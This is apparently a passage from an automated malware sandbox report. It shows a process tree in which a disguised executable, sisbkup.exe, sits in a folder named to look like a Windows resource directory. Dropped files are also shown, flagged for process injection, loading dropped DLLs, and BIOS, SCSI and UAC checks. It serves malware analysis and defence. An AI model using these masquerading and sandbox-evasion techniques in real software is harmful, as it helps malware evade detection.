C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
